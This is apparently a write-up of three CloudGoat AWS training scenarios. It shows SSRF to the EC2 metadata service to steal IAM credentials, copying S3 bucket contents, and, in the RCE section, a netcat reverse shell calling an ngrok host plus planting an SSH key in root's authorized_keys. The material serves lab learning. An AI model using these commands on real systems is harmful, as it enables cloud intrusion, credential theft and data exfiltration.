16 KiB
AWS Cloud Goat
Cloud Goat is a AWS deployment container which is basically a CTF for teaching AWS absuses
Setting up Cloud Goat
Git clone the repo for cloud goat and, install the requirements and run
data:image/s3,"s3://crabby-images/8a3d0/8a3d0b12b3ccd98d7748b8398f523972161fafc5" alt=""
data:image/s3,"s3://crabby-images/b1940/b194018ffcb32faae533414ebc1d614ca633c412" alt=""
Cloud goat also requires Terraform
which is used for managing the cloud infrastructure through templates and policies through cli or through code
https://www.terraform.io/downloads
data:image/s3,"s3://crabby-images/bf139/bf1390aa4edfbbfd109e051f78c27759e0fdf0ff" alt=""
After downloading terraform, move it to /usr/bin/
and after that you can run cloudgoat.py
data:image/s3,"s3://crabby-images/5f1b5/5f1b5dcd8c114e404611069f1702ca662b892a46" alt=""
Before creating a scenario, we need to have a free tier AWS account and for that you do need to provide valid details reagrding the credit card but no amount will be deducted
data:image/s3,"s3://crabby-images/de494/de494e0fa3ec56228fb6151b2714f93168b8fc27" alt=""
Login as the root user on aws management console
data:image/s3,"s3://crabby-images/45994/45994a0fb6b03c129ba12b7ee37353541d0e0082" alt=""
After logging we need to create a user
data:image/s3,"s3://crabby-images/1c6f3/1c6f3bd1f94bd07598837da9a9506ec1187d1abd" alt=""
data:image/s3,"s3://crabby-images/fcebe/fcebe170a16b0aec7c5c4bed6f148e16f91594ff" alt=""
On this user we need to set AdministratorAccess
policy
data:image/s3,"s3://crabby-images/f4a56/f4a5681ca8cc1fcded8259c966ec2f55e0163f32" alt=""
Skip the Add tags
option
data:image/s3,"s3://crabby-images/7bb60/7bb60701d36a94ecd8a1aad41dd4a069112d2eff" alt=""
data:image/s3,"s3://crabby-images/cf0d2/cf0d2088349030c90b47c75c9344bbe11694271e" alt=""
After creating the user, We'll get AWS session and secret key
data:image/s3,"s3://crabby-images/15438/15438a3e2cd36690c57845083ab840e6e914e4ae" alt=""
Now use awscli
to configure aws session for this user by creating a profile becuase this script will be using the AWS resources from our account so make to remove them after you are done with the scenarios
data:image/s3,"s3://crabby-images/c80c0/c80c09f51ca2a57f7629fc5e03afc215df8f0df0" alt=""
You may encounter an error where cloudgoat script may fail to install terraform-provider-archive
so to fix this issue manually download the binary and place it in /usr/bin
data:image/s3,"s3://crabby-images/ee14f/ee14f6bd56a7fce7f0030bf4cc08f0b9db3fd913" alt=""
Cloud Breach s3 (Medium)
In this scenario we need to query the metadata of EC2 from a reverse proxy and access AWS session then using those keys we need to extract data from s3 bucket, so creating this scenario
data:image/s3,"s3://crabby-images/49b8b/49b8bc260628355efb95e584aaeeb37b4270730c" alt=""
To start attacking, we can get the IP address from the generated start.txt
file
data:image/s3,"s3://crabby-images/824c0/824c043a76d95be6a78f96456935a74af6739ab0" alt=""
Running an nmap scan (it isn't necessary) we can see that it's an ec2 instance
data:image/s3,"s3://crabby-images/e71d8/e71d8cc3ec7089f95841846d007f9a8999297652" alt=""
But it doesn't show anything on the web server
data:image/s3,"s3://crabby-images/46617/466175feb04b0930651f83b8f6d673b37ea7f1b8" alt=""
Making a request with curl
shows that it's configured to work as a proxy to make requests to ec2 metadata
data:image/s3,"s3://crabby-images/630ff/630ff009471cb4550a38f487d125ee2dff4e74fb" alt=""
AWS has an IP for metadata which is 169.254.169.254
, so we need to edit the Host header of the request and make a request to /latest
data:image/s3,"s3://crabby-images/1627f/1627f96d8d743d1262595eb1641b400ec1ab7b2a" alt=""
So we can make a request to /latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidkt0wpx0w0k
, which will show AWS access key
data:image/s3,"s3://crabby-images/a42a1/a42a1436cc62728f1ec76983ebd9c9aa42263435" alt=""
Adding a profile using these keys
data:image/s3,"s3://crabby-images/e992b/e992bf4e4ac94968fca4164bd6832a1718adbba4" alt=""
We can verify the keys if they are working with
aws sts get-caller-identity --profile cloud_breach
data:image/s3,"s3://crabby-images/ef8bd/ef8bd4d53e7471bb3c0daae84d741963e1dca588" alt=""
Now we don't know what's the s3 bucket, we can list s3 buckets if it's associated with the AWS key
aws s3 ls --profile cloud_breach
data:image/s3,"s3://crabby-images/9133e/9133eddff97e5384960ff9fee3ce5cf32f572d24" alt=""
To view contents of this s3 bucket we can list it by giving the bucket name which is cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k
aws s3 ls s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k --profile cloud_breach
data:image/s3,"s3://crabby-images/e1912/e1912a98890cb55e29d893459d3e8235d3f9ff80" alt=""
To copy all files from s3 bucket we can use cp
to copy files, --recusrive
to copy all files .
for the the destination to be the current path
aws s3 --recursive cp s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidkt0wpx0w0k . --profile cloud_breach
data:image/s3,"s3://crabby-images/4c2e5/4c2e55806179a95f1a5e5dbdb6d25ec3664bad6a" alt=""
Accessing any of these file mean that we have compromised s3 bucket which completes this scenario
data:image/s3,"s3://crabby-images/83c08/83c08c3b150fa7a3e03ace5c304402b02580b4dd" alt=""
We can now destory this challenege with python3 cloudgoat.py destroy cloud_breach_s3
data:image/s3,"s3://crabby-images/c3d57/c3d57c45f0eacdd60250bca901eda9f44b5bbbcf" alt=""
EC2 SSRF (Medium)
In this scenario we have access to IAM user through which we have to enumerate permissions and find a lambda function through which we can access EC2 instance and extract data from s3 bucket
To create this scenario, we need to run python3 cloudgoat.py create ec2_ssrf
data:image/s3,"s3://crabby-images/c43d1/c43d1227f302cafca2ca0df70b6531ece413fe5e" alt=""
But at the end this will fail because python3.6 is not supported for creating lambda functions, we can fix it by replacing it with python3.9 by editing scenarios/ec2_ssrf/terraform/lambda.tf
data:image/s3,"s3://crabby-images/c0eb3/c0eb36fed1994ebb0c3f0ff8d2d3fd9bc33ddeb5" alt=""
data:image/s3,"s3://crabby-images/c0232/c023242e40d4bc17d30a321a577b3b9f6c73a037" alt=""
Now running the script again to create the scenario
data:image/s3,"s3://crabby-images/3312b/3312b190b03bbae095d11c958772d0df8fe734d9" alt=""
In start.txt
we havet the acount id and AWS access key for solus
IAM user
data:image/s3,"s3://crabby-images/3ec1c/3ec1cff04c0d61b79e2041f8610768edccba00f2" alt=""
So let's create a profile for solus user with AWS keys
data:image/s3,"s3://crabby-images/808e5/808e574480834a8ae0f388c8bc7c4cce3c5ec39a" alt=""
To verify if the AWS keys are working
aws sts get-caller-identity --profile solus
data:image/s3,"s3://crabby-images/0e66c/0e66c03b0fe18e018e9d8ff0d3c4391834d10707" alt=""
Listing lambda functions with
aws lambda list-functions --profile solus --region us-east-1
data:image/s3,"s3://crabby-images/b3d89/b3d89cb7990dbffe53210d9a81429a2003855a70" alt=""
This reveals EC2 access key, to use them we need to create another profile for this access key, also if we try invoking this function it won't work
data:image/s3,"s3://crabby-images/623a7/623a7b9070f2ec141cf7665f35cbae7c9785c13e" alt=""
So creating aws profile
data:image/s3,"s3://crabby-images/f2c7e/f2c7e41f2cf7abd9f81e37e99b78676324a74387" alt=""
Running ec2 describe-instances
to view the instances associated with the access key
aws ec2 describe-instances --profile solus_ec2 --region us-east-1
data:image/s3,"s3://crabby-images/d1484/d148471580f770b14d8c83dd492bc3d0cb9d6156" alt=""
Scrolling a little down we'll get the instance's IP address which will also reveal public IP
data:image/s3,"s3://crabby-images/dd41d/dd41d55833628a8ce411842c4d43e21a4b9bcf7f" alt=""
Running nmap scan on EC2 instance to see which ports are open
data:image/s3,"s3://crabby-images/8795b/8795b053a2ffad7d1a8d60c1d399cc747024edbc" alt=""
It has a web server running so let's visit that, the default page had some issues as the creator didn't handle the errors properly
data:image/s3,"s3://crabby-images/97581/9758122a8a15d5afa2a49c402364d86c907e74bd" alt=""
We can resolve this by including url
GET parameter
data:image/s3,"s3://crabby-images/c48a8/c48a878cb29795772733a6850dc626259fde682b" alt=""
As the page tells that this is about SSRF, we can try making a requesst to EC2 metadata on IP 169.254.169.254
data:image/s3,"s3://crabby-images/e8857/e8857e173422c3fc85cc5de9ebc36644a23c5505" alt=""
Making a request to /latest/meta-data/iam/security-credentials/
we'll get the role cg-ec2-role-ec2_ssrf_cgidne4wv0ljch
for which we can get read the AWS keys
data:image/s3,"s3://crabby-images/c187e/c187eb76002096aaabf781f2283955932163e204" alt=""
data:image/s3,"s3://crabby-images/74103/74103e6b81774b3cbfcf44e2a76a73f5fd901480" alt=""
With aws configure
we can use the AWS keys to create a profile for ec2_ssrf
data:image/s3,"s3://crabby-images/b8be8/b8be8b8ef986a237a86075599a603dd0ee713b30" alt=""
We also need to add the session token
data:image/s3,"s3://crabby-images/b01fa/b01fafb70d103e0927f053dff096947e028c72d4" alt=""
data:image/s3,"s3://crabby-images/018ad/018ad65833e7fe630d26360bc23b7d928d4e7fec" alt=""
To access s3 bucket, we first to list them with aws s3 ls --profile ec2_ssrf
data:image/s3,"s3://crabby-images/f292e/f292ee9e1bd26d3d31e016499f3ea7bc291796ff" alt=""
Listing the contents of this bucket will shows us a text file
data:image/s3,"s3://crabby-images/6521b/6521b31c5e9a9aa6c175051a08e8bacf6d4bb661" alt=""
Downloading this file with cp
, we'll get AWS keys for another user which seems to be privileged from from the name of the text file
data:image/s3,"s3://crabby-images/d402b/d402be996c68848acaf1f96a979050acfef39a69" alt=""
data:image/s3,"s3://crabby-images/2d878/2d8786c747fb9ce3b00ba61b8f1304138eecfcc7" alt=""
Checking this user's identitiy, it's shepard
data:image/s3,"s3://crabby-images/7bc31/7bc31e8d002f6cd5ddc26994e8911528416596de" alt=""
Now invoking the function which we tried before with solus user but this time trying with shepard
aws lambda invoke --function-name cg-lambda-ec2_ssrf_cgidne4wv0ljch --profile ec2_ssrf_admin --region us-east-1 ./output.txt
data:image/s3,"s3://crabby-images/ec7be/ec7be9acb3485952e7f940d6a31475bb09f53331" alt=""
Reading the response from the text file, we'll see that we completed this scenario
data:image/s3,"s3://crabby-images/0eaa8/0eaa8321b3f55bee43ce9bf16bef4a1df6c2f05e" alt=""
We can destory this scenario with cloudgoat.py destroy ec2_ssrf
data:image/s3,"s3://crabby-images/2e4a5/2e4a51301f5eebd110a61b23f5a0ea8bb8835174" alt=""
data:image/s3,"s3://crabby-images/0a66f/0a66f1bcd8eeceeeaa61fdd4b0b05b10ce0d0c26" alt=""
RCE Web App (Hard)
In this scenario we have access to two IAM users and access s3 bucket which will lead to a vulnerable web app for rce
We can create this scenario with python3 cloudgoat.py create rce_web_app
data:image/s3,"s3://crabby-images/e2ee5/e2ee58bcd35e945649fe6e92c39ce0e76640ed08" alt=""
But at the end it showed an error that it wasn't able to create RDS (Amazon Relational Database) DB instance because it couldn't find postgres 9.6 because that has been deprecated
data:image/s3,"s3://crabby-images/7a5b2/7a5b2e98351036acea42b601a80a710be53a5df4" alt=""
data:image/s3,"s3://crabby-images/dde45/dde45ca3282fe0aca791414ba465623bbe3fcd8c" alt=""
This issue can be resolved by replacing the postgres version to 12
data:image/s3,"s3://crabby-images/36ff0/36ff05687cbdea054130d13d3eac8a5de7e9361c" alt=""
data:image/s3,"s3://crabby-images/a7953/a79532a945bb7c4a31f4cf3be004db47f983c372" alt=""
Here we have two users lara
and mcduck
, so first I'll take the path from lara
Path from Lara
Creating a profile for lara by using access and secret key
data:image/s3,"s3://crabby-images/9e749/9e7494b01b86611427cc5ae51aa4efefeb71e4a6" alt=""
We can verfiy if the keys are working
data:image/s3,"s3://crabby-images/f5640/f56408ec376ba93855976eb823c08057b779bb06" alt=""
From this IAM user we can access s3 bucket
aws s3 ls --profile lara
data:image/s3,"s3://crabby-images/76bb9/76bb906bc431b08bf278b6dc5e43e1697aa834bc" alt=""
We can see there are three buckets but this user can access only cg-logs
bucket
data:image/s3,"s3://crabby-images/18a9f/18a9fc158ec82d93af7fc0db296127d890e75a09" alt=""
To download cg-lb-logs
folder recursivley
aws s3 cp --recursive s3://cg-logs-s3-bucket-rce-web-app-cgid3ntl2q2i88 . --profile lara
data:image/s3,"s3://crabby-images/9f3b8/9f3b8d5055a4b7d261654e3eb0712aae1ccac4bb" alt=""
On accessing that folder, there's a log file which contained some requests
data:image/s3,"s3://crabby-images/82e19/82e1949396e9fb135d8e3edb999ab9c6839ea684" alt=""
data:image/s3,"s3://crabby-images/35a59/35a592d761e882b3181a59a2af2427ca8891810b" alt=""
Making a request to see these urls are alive but they were down
data:image/s3,"s3://crabby-images/3f8da/3f8da2847774e8b989a4a46fee7b11dc6c3ec146" alt=""
So we know there might be a web app running, we can try listing an ec2 instances through this profile
aws ec2 describe-instances --profile lara --region us-east-1
data:image/s3,"s3://crabby-images/ed123/ed123f0cfc3d99edacd7eca2f4be9d4c08708403" alt=""
We scan this ec2 instance for open ports which shows that there's only ssh open the instance
data:image/s3,"s3://crabby-images/6e429/6e4299aacbd9d7922b536ef8591f0e8198dde483" alt=""
So there's nothing we can do from the ec2, the log file belongs to a load balancer, so we can try lisiting the load balancers with elbv2 describe-load-balancers
aws elbv2 describe-load-balancers --profile lara --region us-east-1
data:image/s3,"s3://crabby-images/50403/50403146ab8002b68bb5113a7a12b0d1c2ea270b" alt=""
We can visit this url and access the site
data:image/s3,"s3://crabby-images/74a22/74a222e12c719ac3ef9fd8b3b0c115d53f0f3148" alt=""
This talks about visiting "the secret url" which we can find from the logs
data:image/s3,"s3://crabby-images/013e9/013e949ba5107fe889ada6bfde99b45a8cc5359e" alt=""
This gives us a functionality to execute commands which we can abuse to get a reverse shell
data:image/s3,"s3://crabby-images/1ef21/1ef218196f3bfb4283156dc795d1c3c4de05626f" alt=""
For reverse shell, we can use ngork
which is used for exposing local port over the internet, I was having issues with ngrok not working with kali linux so I swtiched to ubuntu for getting a shell using busybox variant of netcat
echo "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 0.tcp.ap.ngrok.io 11400 >/tmp/f" |base64 -w0
data:image/s3,"s3://crabby-images/05899/058998d146904abc7a21b3b2dd10d4c6e325ad2f" alt=""
data:image/s3,"s3://crabby-images/cae9e/cae9e48beb07a568ca25e4d7d4522445dbf133ae" alt=""
We can run ngrok with ngrok tcp 2222
data:image/s3,"s3://crabby-images/69de1/69de1426f3e3314624e5a39184723537f9d148f1" alt=""
But issue is when getting a reverse shell, the application stops responding
data:image/s3,"s3://crabby-images/e56a2/e56a28fa55e508513ae906464051b191b327df88" alt=""
data:image/s3,"s3://crabby-images/d477d/d477d0f92a8190da1024b9b56d34c09c0a56991e" alt=""
We can try accessing root's ssh key but it wasn't generated
data:image/s3,"s3://crabby-images/2724d/2724d514099b5853efed5e7443c57fc93963b415" alt=""
Since we are root user, we can add our ssh public key and login with the private key
data:image/s3,"s3://crabby-images/71368/71368124703685f58140ae86fd1a28e79fb2a576" alt=""
echo "ssh public key " > /root/.ssh/authorized_keys
On adding the key I was getting an error due to Unterminated quoted string
, I am not sure why I was getting that but I wasn't able to add the ssh key
data:image/s3,"s3://crabby-images/bf217/bf21763bbe7992d24969197056f22cf058bc981e" alt=""
If we check root's authorized_keys file, it says to login as ubuntu
data:image/s3,"s3://crabby-images/b3c1b/b3c1bfdf431b770ed95fcb5833da9c28c3b8710f" alt=""
Either the ssh key is being truncated for some reason or it needs a proper format for the key as AWS supports D25519
and 2048-bit
SSH-2 RSA keys for Linux instances, there is even an issue reported for this part
data:image/s3,"s3://crabby-images/02bde/02bde92cd2e910afd46337121ef786ed6c41c8d2" alt=""
data:image/s3,"s3://crabby-images/c9787/c978726a5db06cbc392223de022d8191eff07041" alt=""
Generate the key again with ed25519
data:image/s3,"s3://crabby-images/f2fc7/f2fc7f9c5676b236aea537920ad683cc6e49e36b" alt=""
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG5QcNdp9tUZRQvmkPMDfZpXciiy+7YVTdNI9RyUPbcR arz@kali" > /root/.ssh/authorized_keys
data:image/s3,"s3://crabby-images/5183c/5183c7a2773f9b52d80ca12f0e9e12551890cc64" alt=""
We can see that this worked perfectly with no errors which means we can now login into the ec2 instance we found earlier
data:image/s3,"s3://crabby-images/2095a/2095a8d1314b2f6e7119e05c07b5b19c73584d9d" alt=""
Having access to EC2, we can query for the metadata from the magic AWS IP 169.254.169.254
curl 169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-rce_web_app_cgidd9pk8lqvym
data:image/s3,"s3://crabby-images/92409/9240939dab41a2293fb2bc50969f07ca4b22438d" alt=""
Using the keys we can create a new profile for aws session
data:image/s3,"s3://crabby-images/55209/55209fa5803619b73e99f844d5b0ce76f5e4a5a2" alt=""
data:image/s3,"s3://crabby-images/d50ef/d50ef8964ee8a78d63d582e11ec5572e344ba636" alt=""
With this user we can access the secrets s3 bucket and find db.txt
data:image/s3,"s3://crabby-images/5c0c2/5c0c2b0b02d337b43bb321942a0286368bf0c965" alt=""
Downloading the file
data:image/s3,"s3://crabby-images/8d701/8d701c51574d7e809857742cad6df526c14991e9" alt=""
From this file we'll get the credentials for database
data:image/s3,"s3://crabby-images/7588e/7588e9cb63dfe91ded5812e4429886c7116c13d7" alt=""
DB instance can be found with rds describe-db-instances
aws rds describe-db-instances --profile rce_web --region us-east-1
data:image/s3,"s3://crabby-images/48d19/48d1957dc83173629917621e95c9ba5cc9527f1e" alt=""
This is an internal instance, so we need to access it from ec2
data:image/s3,"s3://crabby-images/58922/58922982b96124b69e14fb6ac641e093cfd6a22f" alt=""
Database can be accessed with psql
psql -h cg-rds-instance-rce-web-app-cgidd9pk8lqvym.cvqhxg0xsdki.us-east-1.rds.amazonaws.com -U cgadmin -d cloudgoat
data:image/s3,"s3://crabby-images/3b115/3b11583d27fddd9d101608e5a05e0d3284ff0c60" alt=""
Lisiting the tables with \d
data:image/s3,"s3://crabby-images/14d64/14d6490acd4c07ee7f119d03143857f343417ac1" alt=""
we have a table named sensitive_information
, so let's query the table with select * from sensitive_information
data:image/s3,"s3://crabby-images/5dd00/5dd002c1b565e22f01bbb776b406a2aeec783e2c" alt=""
By having the secret password, the rce scenario will be completed
Path from McDuck
Using McDuck's aws keys
data:image/s3,"s3://crabby-images/ac575/ac5757a0a436a32002ca89b3bda500f15bb5bee2" alt=""
With this user we can try listing s3 buckets
data:image/s3,"s3://crabby-images/44cfe/44cfeeb17c300d7a58a6b36731213b406ef11fdc" alt=""
Now with lara
we were only able to access the cg-logs
bucket but with mcduck
we can access cg-keystore
bucket
data:image/s3,"s3://crabby-images/c7a3a/c7a3afdbf56b88d046e3c376196f43ec2e6029cd" alt=""
Downloading the public and private keys
data:image/s3,"s3://crabby-images/426cb/426cb6d3a9dbe546ed53c85c29366bcb2782c041" alt=""
data:image/s3,"s3://crabby-images/cc3dc/cc3dc98fbce85a418492a935c0eff0f87f10ae84" alt=""
From lara we arleady know the IP of the ec2 instance so we can login using ubuntu user through ssh
data:image/s3,"s3://crabby-images/f8215/f82156a507b357b4a24e19f80c0873deebb07d05" alt=""
From here we could either get the keys from metdata or install awscli, access s3 bucket to get the credentials to the database, list the realation database instance and use postgresql client to access database, since we have sudo privileges we can become root user
data:image/s3,"s3://crabby-images/66804/66804562f5a589cad438ce9eebde6a055fd06d18" alt=""
apt install awscli
data:image/s3,"s3://crabby-images/50f39/50f39472f55098c45efa56304506999d6a339a9a" alt=""
aws sts get-caller-identity
data:image/s3,"s3://crabby-images/67df4/67df41ec1c73740f46e2e20d5ec879e2ed11a561" alt=""
Accessing the s3 bucket to get database credentials
data:image/s3,"s3://crabby-images/4b998/4b998b4b42c20894852b85aa9cea4b0a72095035" alt=""
Now getting database instance's IP
aws rds describe-db-instances --region us-east-1
data:image/s3,"s3://crabby-images/a14b6/a14b6fa7dbfafbe60f251c51d07e4004f5517d19" alt=""
And with the credentials and database's instance we'll able to login and complete the scenario like we did with lara user.
References
- https://github.com/RhinoSecurityLabs/cloudgoat
- https://www.terraform.io/downloads
- https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/
- https://pentestbook.six2dez.com/enumeration/cloud/aws
- https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_PostgreSQL.html
- https://www.bluematador.com/learn/aws-cli-cheatsheet
- https://github.com/RhinoSecurityLabs/cloudgoat/issues/49
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql